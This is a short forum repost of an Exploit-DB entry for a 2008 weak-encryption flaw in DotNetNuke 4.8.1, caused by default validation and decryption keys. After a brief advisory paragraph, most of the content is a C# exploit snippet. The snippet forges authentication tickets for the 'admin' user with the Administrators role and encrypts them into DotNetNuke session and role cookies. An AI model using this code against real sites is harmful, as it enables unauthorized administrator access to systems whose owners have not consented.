Exploit DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31465
Проверка EDB
  1. Пройдено
Автор
BRIAN HOLYFIELD
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-6540
Дата публикации
2008-03-21
Код:
source: https://www.securityfocus.com/bid/28391/info

DotNetNuke is prone to a weak encryption vulnerability.

An attacker can exploit this issue to decrypt sensitive data. Information obtained may lead to further attacks.

This issue affects DotNetNuke 4.8.1; other versions may also be affected. 

  // Step 1: Generate the two FormsAuthenticationTickets
      FormsAuthenticationTicket  ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
      FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered
Users;Subscribers;Administrators");


      // Step 2: Encrypt the FormsAuthenticationTickets
      string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
      string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);
 
Источник
www.exploit-db.com

Похожие темы